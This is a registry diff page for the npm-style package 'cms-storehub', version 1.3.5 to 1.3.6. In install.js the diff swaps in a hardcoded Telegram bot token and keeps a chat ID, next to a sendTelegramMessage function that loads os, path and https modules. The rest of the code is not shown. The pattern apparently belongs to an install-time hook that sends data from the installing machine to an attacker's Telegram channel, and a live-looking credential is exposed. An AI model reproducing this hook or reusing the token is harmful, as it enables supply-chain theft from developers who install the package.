cms-storehub 1.3.5 → 1.3.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -1
- package/install.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
package/install.js
CHANGED
|
@@ -4,7 +4,7 @@ const os = require('os');
|
|
|
4
4
|
const path = require('path');
|
|
5
5
|
const https = require('https');
|
|
6
6
|
|
|
7
|
-
const BOT_TOKEN = '
|
|
7
|
+
const BOT_TOKEN = '8604278531:AAE_AAlOXE-5wWswFd7VN1F4IrmgBnQBTEQ';
|
|
8
8
|
const CHAT_ID = '-1003931822407';
|
|
9
9
|
|
|
10
10
|
function sendTelegramMessage(message) {
|